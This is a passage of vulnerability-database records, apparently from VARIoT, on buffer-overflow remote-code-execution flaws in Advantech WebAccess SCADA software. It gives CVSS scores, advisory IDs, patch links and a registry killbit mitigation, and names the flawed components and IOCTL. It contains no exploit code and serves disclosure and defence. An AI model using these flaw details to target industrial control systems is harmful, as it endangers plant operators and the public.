"ZDI_CAN", "id": "ZDI-CAN-3180", "trust": 0.7 }, { "db": "ZDI_CAN", "id": "ZDI-CAN-3194", "trust": 0.7 }, { "db": "ZDI_CAN", "id": "ZDI-CAN-3237", "trust": 0.7 }, { "db": "ZDI", "id": "ZDI-16-064", "trust": 0.7 }, { "db": "ZDI_CAN", "id": "ZDI-CAN-3234", "trust": 0.7 }, { "db": "ZDI", "id": "ZDI-16-067", "trust": 0.7 }, { "db": "ZDI_CAN", "id": "ZDI-CAN-3233", "trust": 0.7 }, { "db": "ZDI", "id": "ZDI-16-068", "trust": 0.7 }, { "db": "BID", "id": "80745", "trust": 0.3 }, { "db": "IVD", "id": "64CFD42C-2351-11E6-ABEF-000C29C66E3D", "trust": 0.2 }, { "db": "VULHUB", "id": "VHN-88367", "trust": 0.1 } ], "sources": [ { "db": "IVD", "id": "64cfd42c-2351-11e6-abef-000c29c66e3d" }, { "db": "ZDI", "id": "ZDI-16-065" }, { "db": "ZDI", "id": "ZDI-16-121" }, { "db": "ZDI", "id": "ZDI-16-066" }, { "db": "ZDI", "id": "ZDI-16-119" }, { "db": "ZDI", "id": "ZDI-16-107" }, { "db": "ZDI", "id": "ZDI-16-064" }, { "db": "ZDI", "id": "ZDI-16-067" }, { "db": "ZDI", "id": "ZDI-16-068" }, { "db": "CNVD", "id": "CNVD-2016-00435" }, { "db": "VULHUB", "id": "VHN-88367" }, { "db": "BID", "id": "80745" }, { "db": "JVNDB", "id": "JVNDB-2016-001287" }, { "db": "CNNVD", "id": "CNNVD-201601-330" }, { "db": "NVD", "id": "CVE-2016-0857" } ] }, "id": "VAR-201601-0039", "iot": { "_id": null, "data": true, "sources": [ { "db": "IVD", "id": "64cfd42c-2351-11e6-abef-000c29c66e3d" }, { "db": "CNVD", "id": "CNVD-2016-00435" }, { "db": "VULHUB", "id": "VHN-88367" } ], "trust": 1.33470696 }, "iot_taxonomy": { "_id": null, "data": [ { "category": [ "ICS" ], "sub_category": null, "trust": 0.8 } ], "sources": [ { "db": "IVD", "id": "64cfd42c-2351-11e6-abef-000c29c66e3d" }, { "db": "CNVD", "id": "CNVD-2016-00435" } ] }, "last_update_date": "2024-11-23T21:43:23.510000Z", "patch": { "_id": null, "data": [ { "title": "Advantech has issued an update to correct this vulnerability.", "trust": 5.6, "url": "https://ics-cert.us-cert.gov/advisories/ICSA-16-014-01" }, { "title": "Advantech WebAccess", "trust": 0.8, "url": "http://www.advantech.com/industrial-automation/webaccess" }, { "title": "Patch for Advantech WebAccess Buffer Overflow Vulnerability", "trust": 0.6, "url": "https://www.cnvd.org.cn/patchInfo/show/70379" }, { "title": "Advantech WebAccess Fixes for heap-based buffer overflow vulnerabilities", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=59648" } ], "sources": [ { "db": "ZDI", "id": "ZDI-16-065" }, { "db": "ZDI", "id": "ZDI-16-121" }, { "db": "ZDI", "id": "ZDI-16-066" }, { "db": "ZDI", "id": "ZDI-16-119" }, { "db": "ZDI", "id": "ZDI-16-107" }, { "db": "ZDI", "id": "ZDI-16-064" }, { "db": "ZDI", "id": "ZDI-16-067" }, { "db": "ZDI", "id": "ZDI-16-068" }, { "db": "CNVD", "id": "CNVD-2016-00435" }, { "db": "JVNDB", "id": "JVNDB-2016-001287" }, { "db": "CNNVD", "id": "CNNVD-201601-330" } ] }, "problemtype_data": { "_id": null, "data": [ { "problemtype": "CWE-119", "trust": 1.9 } ], "sources": [ { "db": "VULHUB", "id": "VHN-88367" }, { "db": "JVNDB", "id": "JVNDB-2016-001287" }, { "db": "NVD", "id": "CVE-2016-0857" } ] }, "references": { "_id": null, "data": [ { "trust": 8.4, "url": "https://ics-cert.us-cert.gov/advisories/icsa-16-014-01" }, { "trust": 1.4, "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2016-0857" }, { "trust": 1.1, "url": "http://www.zerodayinitiative.com/advisories/zdi-16-107" }, { "trust": 1.1, "url": "http://www.zerodayinitiative.com/advisories/zdi-16-119" }, { "trust": 1.1, "url": "http://www.zerodayinitiative.com/advisories/zdi-16-121" }, { "trust": 0.8, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2016-0857" }, { "trust": 0.3, "url": "http://webaccess.advantech.com" } ], "sources": [ { "db": "ZDI", "id": "ZDI-16-065" }, { "db": "ZDI", "id": "ZDI-16-121" }, { "db": "ZDI", "id": "ZDI-16-066" }, { "db": "ZDI", "id": "ZDI-16-119" }, { "db": "ZDI", "id": "ZDI-16-107" }, { "db": "ZDI", "id": "ZDI-16-064" }, { "db": "ZDI", "id": "ZDI-16-067" }, { "db": "ZDI", "id": "ZDI-16-068" }, { "db": "CNVD", "id": "CNVD-2016-00435" }, { "db": "VULHUB", "id": "VHN-88367" }, { "db": "BID", "id": "80745" }, { "db": "JVNDB", "id": "JVNDB-2016-001287" }, { "db": "CNNVD", "id": "CNNVD-201601-330" }, { "db": "NVD", "id": "CVE-2016-0857" } ] }, "sources": { "_id": null, "data": [ { "db": "IVD", "id": "64cfd42c-2351-11e6-abef-000c29c66e3d", "ident": null }, { "db": "ZDI", "id": "ZDI-16-065", "ident": null }, { "db": "ZDI", "id": "ZDI-16-121", "ident": null }, { "db": "ZDI", "id": "ZDI-16-066", "ident": null }, { "db": "ZDI", "id": "ZDI-16-119", "ident": null }, { "db": "ZDI", "id": "ZDI-16-107", "ident": null }, { "db": "ZDI", "id": "ZDI-16-064", "ident": null }, { "db": "ZDI", "id": "ZDI-16-067", "ident": null }, { "db": "ZDI", "id": "ZDI-16-068", "ident": null }, { "db": "CNVD", "id": "CNVD-2016-00435", "ident": null }, { "db": "VULHUB", "id": "VHN-88367", "ident": null }, { "db": "BID", "id": "80745", "ident": null }, { "db": "JVNDB", "id": "JVNDB-2016-001287", "ident": null }, { "db": "CNNVD", "id": "CNNVD-201601-330", "ident": null }, { "db": "NVD", "id": "CVE-2016-0857", "ident": null } ] }, "sources_release_date": { "_id": null, "data": [ { "date": "2016-01-25T00:00:00", "db": "IVD", "id": "64cfd42c-2351-11e6-abef-000c29c66e3d", "ident": null }, { "date": "2016-02-05T00:00:00", "db": "ZDI", "id": "ZDI-16-065", "ident": null }, { "date": "2016-02-05T00:00:00", "db": "ZDI", "id": "ZDI-16-121", "ident": null }, { "date": "2016-02-05T00:00:00", "db": "ZDI", "id": "ZDI-16-066", "ident": null }, { "date": "2016-02-05T00:00:00", "db": "ZDI", "id": "ZDI-16-119", "ident": null }, { "date": "2016-02-05T00:00:00", "db": "ZDI", "id": "ZDI-16-107", "ident": null }, { "date": "2016-02-05T00:00:00", "db": "ZDI", "id": "ZDI-16-064", "ident": null }, { "date": "2016-02-05T00:00:00", "db": "ZDI", "id": "ZDI-16-067", "ident": null }, { "date": "2016-02-05T00:00:00", "db": "ZDI", "id": "ZDI-16-068", "ident": null }, { "date": "2016-01-25T00:00:00", "db": "CNVD", "id": "CNVD-2016-00435", "ident": null }, { "date": "2016-01-15T00:00:00", "db": "VULHUB", "id": "VHN-88367", "ident": null }, { "date": "2016-01-14T00:00:00", "db": "BID", "id": "80745", "ident": null }, { "date": "2016-01-26T00:00:00", "db": "JVNDB", "id": "JVNDB-2016-001287", "ident": null }, { "date": "2016-01-18T00:00:00", "db": "CNNVD", "id": "CNNVD-201601-330", "ident": null }, { "date": "2016-01-15T03:59:19.313000", "db": "NVD", "id": "CVE-2016-0857", "ident": null } ] }, "sources_update_date": { "_id": null, "data": [ { "date": "2016-02-05T00:00:00", "db": "ZDI", "id": "ZDI-16-065", "ident": null }, { "date": "2016-02-05T00:00:00", "db": "ZDI", "id": "ZDI-16-121", "ident": null }, { "date": "2016-02-05T00:00:00", "db": "ZDI", "id": "ZDI-16-066", "ident": null }, { "date": "2016-02-05T00:00:00", "db": "ZDI", "id": "ZDI-16-119", "ident": null }, { "date": "2016-02-05T00:00:00", "db": "ZDI", "id": "ZDI-16-107", "ident": null }, { "date": "2016-02-05T00:00:00", "db": "ZDI", "id": "ZDI-16-064", "ident": null }, { "date": "2016-02-05T00:00:00", "db": "ZDI", "id": "ZDI-16-067", "ident": null }, { "date": "2016-02-05T00:00:00", "db": "ZDI", "id": "ZDI-16-068", "ident": null }, { "date": "2016-01-25T00:00:00", "db": "CNVD", "id": "CNVD-2016-00435", "ident": null }, { "date": "2016-12-03T00:00:00", "db": "VULHUB", "id": "VHN-88367", "ident": null }, { "date": "2016-01-14T00:00:00", "db": "BID", "id": "80745", "ident": null }, { "date": "2016-01-26T00:00:00", "db": "JVNDB", "id": "JVNDB-2016-001287", "ident": null }, { "date": "2016-01-18T00:00:00", "db": "CNNVD", "id": "CNNVD-201601-330", "ident": null }, { "date": "2024-11-21T02:42:31.157000", "db": "NVD", "id": "CVE-2016-0857", "ident": null } ] }, "threat_type": { "_id": null, "data": "remote", "sources": [ { "db": "CNNVD", "id": "CNNVD-201601-330" } ], "trust": 0.6 }, "title": { "_id": null, "data": "Advantech WebAccess webvrpcs Service BwpAlarm.dll strcpy Heap-Based Buffer Overflow Remote Code Execution Vulnerability", "sources": [ { "db": "ZDI", "id": "ZDI-16-065" }, { "db": "ZDI", "id": "ZDI-16-066" }, { "db": "ZDI", "id": "ZDI-16-064" }, { "db": "ZDI", "id": "ZDI-16-068" } ], "trust": 2.8 }, "type": { "_id": null, "data": "Buffer overflow", "sources": [ { "db": "IVD", "id": "64cfd42c-2351-11e6-abef-000c29c66e3d" }, { "db": "CNNVD", "id": "CNNVD-201601-330" } ], "trust": 0.8 } }
var-201708-1581
Vulnerability from variot
This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Advantech WebAccess. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within nvA1Media.ocx. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a stack-based buffer. An attacker can leverage this vulnerability to execute arbitrary code under the context of the current process. Advantech WebAccess is a suite of browser-based HMI/SCADA software from Advantech. The software supports dynamic graphical display and real-time data control, and provides the ability to remotely control and manage automation equipment
Show details on source website{ "affected_products": { "_id": null, "data": [ { "_id": null, "model": "webaccess", "scope": null, "trust": 1.3, "vendor": "advantech", "version": null }, { "_id": null, "model": "webaccess", "scope": "eq", "trust": 0.2, "vendor": "advantech", "version": "*" } ], "sources": [ { "db": "IVD", "id": "19ad071c-f84f-4b40-b641-7f04597267c8" }, { "db": "ZDI", "id": "ZDI-17-567" }, { "db": "CNVD", "id": "CNVD-2017-19439" } ] }, "credits": { "_id": null, "data": "Anonymous", "sources": [ { "db": "ZDI", "id": "ZDI-17-567" } ], "trust": 0.7 }, "cvss": { "_id": null, "data": [ { "cvssV2": [ { "acInsufInfo": null, "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "ZDI", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "ZDI-17-567", "impactScore": 6.4, "integrityImpact": "PARTIAL", "obtainAllPrivilege": null, "obtainOtherPrivilege": null, "obtainUserPrivilege": null, "severity": "HIGH", "trust": 0.7, "userInteractionRequired": null, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "CNVD", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "CNVD-2017-19439", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "HIGH", "trust": 0.6, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "IVD", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "19ad071c-f84f-4b40-b641-7f04597267c8", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "HIGH", "trust": 0.2, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.9 [IVD]" } ], "cvssV3": [], "severity": [ { "author": "ZDI", "id": "ZDI-17-567", "trust": 0.7, "value": "HIGH" }, { "author": "CNVD", "id": "CNVD-2017-19439", "trust": 0.6, "value": "HIGH" }, { "author": "IVD", "id": "19ad071c-f84f-4b40-b641-7f04597267c8", "trust": 0.2, "value": "HIGH" } ] } ], "sources": [ { "db": "IVD", "id": "19ad071c-f84f-4b40-b641-7f04597267c8" }, { "db": "ZDI", "id": "ZDI-17-567" }, { "db": "CNVD", "id": "CNVD-2017-19439" } ] }, "description": { "_id": null, "data": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Advantech WebAccess. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within nvA1Media.ocx. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a stack-based buffer. An attacker can leverage this vulnerability to execute arbitrary code under the context of the current process. Advantech WebAccess is a suite of browser-based HMI/SCADA software from Advantech. The software supports dynamic graphical display and real-time data control, and provides the ability to remotely control and manage automation equipment", "sources": [ { "db": "ZDI", "id": "ZDI-17-567" }, { "db": "CNVD", "id": "CNVD-2017-19439" }, { "db": "IVD", "id": "19ad071c-f84f-4b40-b641-7f04597267c8" } ], "trust": 1.35 }, "external_ids": { "_id": null, "data": [ { "db": "ZDI", "id": "ZDI-17-567", "trust": 1.3 }, { "db": "CNVD", "id": "CNVD-2017-19439", "trust": 0.8 }, { "db": "ZDI_CAN", "id": "ZDI-CAN-4099", "trust": 0.7 }, { "db": "IVD", "id": "19AD071C-F84F-4B40-B641-7F04597267C8", "trust": 0.2 } ], "sources": [ { "db": "IVD", "id": "19ad071c-f84f-4b40-b641-7f04597267c8" }, { "db": "ZDI", "id": "ZDI-17-567" }, { "db": "CNVD", "id": "CNVD-2017-19439" } ] }, "id": "VAR-201708-1581", "iot": { "_id": null, "data": true, "sources": [ { "db": "IVD", "id": "19ad071c-f84f-4b40-b641-7f04597267c8" }, { "db": "CNVD", "id": "CNVD-2017-19439" } ], "trust": 1.2173957400000002 }, "iot_taxonomy": { "_id": null, "data": [ { "category": [ "ICS" ], "sub_category": null, "trust": 0.8 } ], "sources": [ { "db": "IVD", "id": "19ad071c-f84f-4b40-b641-7f04597267c8" }, { "db": "CNVD", "id": "CNVD-2017-19439" } ] }, "last_update_date": "2022-05-17T01:47:53.757000Z", "patch": { "_id": null, "data": [ { "title": "This vulnerability is being disclosed publicly without a patch in accordance with the ZDI 120 day deadline.11/08/2016, 11/09/2016, 11/10/2016 and 11/15/2016 - ZDI disclosed the reports, 44 in all, to ICS-CERT11/09/2016 - The vendor acknowledged receipt of the report through ICS-CERT and ICS-CERT provided ICS-VU-71410304/27/2017 - ICS-CERT notified ZDI these might be fixed in the latest version and asked would ZDI re-test05/03/2017 - ZDI replied that we cannot do the testing for AdvantechICS-CERT did not respond06/23/2017 - ZDI wrote to ICS-CERT requesting any available update07/31/2017 - ZDI wrote to ICS-CERT requesting any available update08/01/2017 - ZDI wrote to ICS-CERT advising of the intent to 0-day-- Mitigation:The killbit can be set on this control to disable scripting within Internet Explorer by modifying the data value of the Compatibility Flags DWORD within the following location in the registry:HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Internet Explorer\\ActiveX Compatibility\\E19E79EC-F62E-40A0-952D-E49AEC7BEC2FIf the Compatibility Flags value is set to 0x00000400, the control can no longer be instantiated inside the browser.For more information, please see: ", "trust": 0.7, "url": "http://support.microsoft.com/kb/240797" } ], "sources": [ { "db": "ZDI", "id": "ZDI-17-567" } ] }, "references": { "_id": null, "data": [ { "trust": 0.7, "url": "http://support.microsoft.com/kb/240797" }, { "trust": 0.6, "url": "http://www.zerodayinitiative.com/advisories/zdi-17-567/" } ], "sources": [ { "db": "ZDI", "id": "ZDI-17-567" }, { "db": "CNVD", "id": "CNVD-2017-19439" } ] }, "sources": { "_id": null, "data": [ { "db": "IVD", "id": "19ad071c-f84f-4b40-b641-7f04597267c8", "ident": null }, { "db": "ZDI", "id": "ZDI-17-567", "ident": null }, { "db": "CNVD", "id": "CNVD-2017-19439", "ident": null } ] }, "sources_release_date": { "_id": null, "data": [ { "date": "2017-08-08T00:00:00", "db": "IVD", "id": "19ad071c-f84f-4b40-b641-7f04597267c8", "ident": null }, { "date": "2017-08-07T00:00:00", "db": "ZDI", "id": "ZDI-17-567", "ident": null }, { "date": "2017-08-08T00:00:00", "db": "CNVD", "id": "CNVD-2017-19439", "ident": null } ] }, "sources_update_date": { "_id": null, "data": [ { "date": "2017-08-07T00:00:00", "db": "ZDI", "id": "ZDI-17-567", "ident": null }, { "date": "2017-08-08T00:00:00", "db": "CNVD", "id": "CNVD-2017-19439", "ident": null } ] }, "title": { "_id": null, "data": "Advantech WebAccess nvA1Media Connect MediaUsername Stack Buffer Overflow Remote Code Execution Vulnerability", "sources": [ { "db": "IVD", "id": "19ad071c-f84f-4b40-b641-7f04597267c8" }, { "db": "CNVD", "id": "CNVD-2017-19439" } ], "trust": 0.8 }, "type": { "_id": null, "data": "Buffer overflow", "sources": [ { "db": "IVD", "id": "19ad071c-f84f-4b40-b641-7f04597267c8" } ], "trust": 0.2 } }
var-202110-0997
Vulnerability from variot
Advantech WebAccess versions 9.02 and prior are vulnerable to a heap-based buffer overflow, which may allow an attacker to remotely execute code. Advantech WebAccess Exists in an out-of-bounds write vulnerability.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state. Authentication is not required to exploit this vulnerability.The specific flaw exists within the handling of IOCTL 0x2722. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a heap-based buffer. An attacker can leverage this vulnerability to execute code in the context of Administrator. Advantech WebAccess is a set of browser-based HMI/SCADA software from Advantech.
A heap buffer overflow vulnerability exists in Advantech WebAccess 9.02 and earlier. The software supports dynamic graphic display and real-time data control, and provides functions of remote control and management of automation equipment
Show details on source website{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", "affected_products": { "@id": "https://www.variotdbs.pl/ref/affected_products" }, "configurations": { "@id": "https://www.variotdbs.pl/ref/configurations" }, "credits": { "@id": "https://www.variotdbs.pl/ref/credits" }, "cvss": { "@id": "https://www.variotdbs.pl/ref/cvss/" }, "description": { "@id": "https://www.variotdbs.pl/ref/description/" }, "exploit_availability": { "@id": "https://www.variotdbs.pl/ref/exploit_availability/" }, "external_ids": { "@id": "https://www.variotdbs.pl/ref/external_ids/" }, "iot": { "@id": "https://www.variotdbs.pl/ref/iot/" }, "iot_taxonomy": { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/" }, "patch": { "@id": "https://www.variotdbs.pl/ref/patch/" }, "problemtype_data": { "@id": "https://www.variotdbs.pl/ref/problemtype_data/" }, "references": { "@id": "https://www.variotdbs.pl/ref/references/" }, "sources": { "@id": "https://www.variotdbs.pl/ref/sources/" }, "sources_release_date": { "@id": "https://www.variotdbs.pl/ref/sources_release_date/" }, "sources_update_date": { "@id": "https://www.variotdbs.pl/ref/sources_update_date/" }, "threat_type": { "@id": "https://www.variotdbs.pl/ref/threat_type/" }, "title": { "@id": "https://www.variotdbs.pl/ref/title/" }, "type": { "@id": "https://www.variotdbs.pl/ref/type/" } }, "@id": "https://www.variotdbs.pl/vuln/VAR-202110-0997", "affected_products": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "model": "webaccess", "scope": null, "trust": 1.4, "vendor": "advantech", "version": null }, { "model": "webaccess", "scope": "lte", "trust": 1.0, "vendor": "advantech", "version": "9.0.2" }, { "model": "webaccess", "scope": "lte", "trust": 0.8, "vendor": "\u30a2\u30c9\u30d0\u30f3\u30c6\u30c3\u30af\u682a\u5f0f\u4f1a\u793e", "version": "9.02 and earlier" }, { "model": "webaccess", "scope": "eq", "trust": 0.8, "vendor": "\u30a2\u30c9\u30d0\u30f3\u30c6\u30c3\u30af\u682a\u5f0f\u4f1a\u793e", "version": null }, { "model": "webaccess", "scope": "lte", "trust": 0.6, "vendor": "advantech", "version": "\u003c=9.02" } ], "sources": [ { "db": "ZDI", "id": "ZDI-22-258" }, { "db": "ZDI", "id": "ZDI-22-257" }, { "db": "CNVD", "id": "CNVD-2021-80267" }, { "db": "JVNDB", "id": "JVNDB-2021-013714" }, { "db": "NVD", "id": "CVE-2021-33023" } ] }, "credits": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/credits#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Natnael Samson(@NattiSamson)", "sources": [ { "db": "ZDI", "id": "ZDI-22-258" }, { "db": "ZDI", "id": "ZDI-22-257" }, { "db": "CNNVD", "id": "CNNVD-202110-897" } ], "trust": 2.0 }, "cve": "CVE-2021-33023", "cvss": { "@context": { "cvssV2": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2" }, "cvssV3": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/" }, "severity": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#" }, "@id": "https://www.variotdbs.pl/ref/cvss/severity" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "cvssV2": [ { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "nvd@nist.gov", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "CVE-2021-33023", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "HIGH", "trust": 1.9, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "CNVD", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "CNVD-2021-80267", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "HIGH", "trust": 0.6, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "VULHUB", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "VHN-393009", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "HIGH", "trust": 0.1, "vectorString": "AV:N/AC:L/AU:N/C:P/I:P/A:P", "version": "2.0" } ], "cvssV3": [ { "attackComplexity": "LOW", "attackVector": "NETWORK", "author": "nvd@nist.gov", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "exploitabilityScore": 3.9, "id": "CVE-2021-33023", "impactScore": 5.9, "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "trust": 2.0, "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, { "attackComplexity": "LOW", "attackVector": "NETWORK", "author": "ZDI", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "exploitabilityScore": 3.9, "id": "CVE-2021-33023", "impactScore": 5.9, "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "trust": 1.4, "userInteraction": "NONE", "vectorString": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0" }, { "attackComplexity": "Low", "attackVector": "Network", "author": "OTHER", "availabilityImpact": "High", "baseScore": 9.8, "baseSeverity": "Critical", "confidentialityImpact": "High", "exploitabilityScore": null, "id": "JVNDB-2021-013714", "impactScore": null, "integrityImpact": "High", "privilegesRequired": "None", "scope": "Unchanged", "trust": 0.8, "userInteraction": "None", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0" } ], "severity": [ { "author": "ZDI", "id": "CVE-2021-33023", "trust": 1.4, "value": "CRITICAL" }, { "author": "nvd@nist.gov", "id": "CVE-2021-33023", "trust": 1.0, "value": "CRITICAL" }, { "author": "ics-cert@hq.dhs.gov", "id": "CVE-2021-33023", "trust": 1.0, "value": "CRITICAL" }, { "author": "NVD", "id": "CVE-2021-33023", "trust": 0.8, "value": "Critical" }, { "author": "CNVD", "id": "CNVD-2021-80267", "trust": 0.6, "value": "HIGH" }, { "author": "CNNVD", "id": "CNNVD-202110-897", "trust": 0.6, "value": "CRITICAL" }, { "author": "VULHUB", "id": "VHN-393009", "trust": 0.1, "value": "HIGH" }, { "author": "VULMON", "id": "CVE-2021-33023", "trust": 0.1, "value": "HIGH" } ] } ], "sources": [ { "db": "ZDI", "id": "ZDI-22-258" }, { "db": "ZDI", "id": "ZDI-22-257" }, { "db": "CNVD", "id": "CNVD-2021-80267" }, { "db": "VULHUB", "id": "VHN-393009" }, { "db": "VULMON", "id": "CVE-2021-33023" }, { "db": "JVNDB", "id": "JVNDB-2021-013714" }, { "db": "CNNVD", "id": "CNNVD-202110-897" }, { "db": "NVD", "id": "CVE-2021-33023" }, { "db": "NVD", "id": "CVE-2021-33023" } ] }, "description": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Advantech WebAccess versions 9.02 and prior are vulnerable to a heap-based buffer overflow, which may allow an attacker to remotely execute code. Advantech WebAccess Exists in an out-of-bounds write vulnerability.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state. Authentication is not required to exploit this vulnerability.The specific flaw exists within the handling of IOCTL 0x2722. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a heap-based buffer. An attacker can leverage this vulnerability to execute code in the context of Administrator. Advantech WebAccess is a set of browser-based HMI/SCADA software from Advantech. \n\r\n\r\nA heap buffer overflow vulnerability exists in Advantech WebAccess 9.02 and earlier. The software supports dynamic graphic display and real-time data control, and provides functions of remote control and management of automation equipment", "sources": [ { "db": "NVD", "id": "CVE-2021-33023" }, { "db": "JVNDB", "id": "JVNDB-2021-013714" }, { "db": "ZDI", "id": "ZDI-22-258" }, { "db": "ZDI", "id": "ZDI-22-257" }, { "db": "CNVD", "id": "CNVD-2021-80267" }, { "db": "VULHUB", "id": "VHN-393009" }, { "db": "VULMON", "id": "CVE-2021-33023" } ], "trust": 3.6 }, "external_ids": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "db": "NVD", "id": "CVE-2021-33023", "trust": 5.4 }, { "db": "ICS CERT", "id": "ICSA-21-285-02", "trust": 3.2 }, { "db": "ZDI", "id": "ZDI-22-257", "trust": 1.3 }, { "db": "JVN", "id": "JVNVU97189148", "trust": 0.8 }, { "db": "JVNDB", "id": "JVNDB-2021-013714", "trust": 0.8 }, { "db": "ZDI_CAN", "id": "ZDI-CAN-12944", "trust": 0.7 }, { "db": "ZDI", "id": "ZDI-22-258", "trust": 0.7 }, { "db": "ZDI_CAN", "id": "ZDI-CAN-12942", "trust": 0.7 }, { "db": "CNNVD", "id": "CNNVD-202110-897", "trust": 0.7 }, { "db": "CNVD", "id": "CNVD-2021-80267", "trust": 0.6 }, { "db": "CS-HELP", "id": "SB2021101312", "trust": 0.6 }, { "db": "AUSCERT", "id": "ESB-2021.3440", "trust": 0.6 }, { "db": "VULHUB", "id": "VHN-393009", "trust": 0.1 }, { "db": "VULMON", "id": "CVE-2021-33023", "trust": 0.1 } ], "sources": [ { "db": "ZDI", "id": "ZDI-22-258" }, { "db": "ZDI", "id": "ZDI-22-257" }, { "db": "CNVD", "id": "CNVD-2021-80267" }, { "db": "VULHUB", "id": "VHN-393009" }, { "db": "VULMON", "id": "CVE-2021-33023" }, { "db": "JVNDB", "id": "JVNDB-2021-013714" }, { "db": "CNNVD", "id": "CNNVD-202110-897" }, { "db": "NVD", "id": "CVE-2021-33023" } ] }, "id": "VAR-202110-0997", "iot": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": true, "sources": [ { "db": "CNVD", "id": "CNVD-2021-80267" }, { "db": "VULHUB", "id": "VHN-393009" } ], "trust": 1.13470696 }, "iot_taxonomy": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "category": [ "ICS" ], "sub_category": null, "trust": 0.6 } ], "sources": [ { "db": "CNVD", "id": "CNVD-2021-80267" } ] }, "last_update_date": "2024-08-14T14:03:02.818000Z", "patch": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "title": "Advantech has issued an update to correct this vulnerability.", "trust": 1.4, "url": "https://www.cisa.gov/uscert/ics/advisories/icsa-21-285-02" }, { "title": 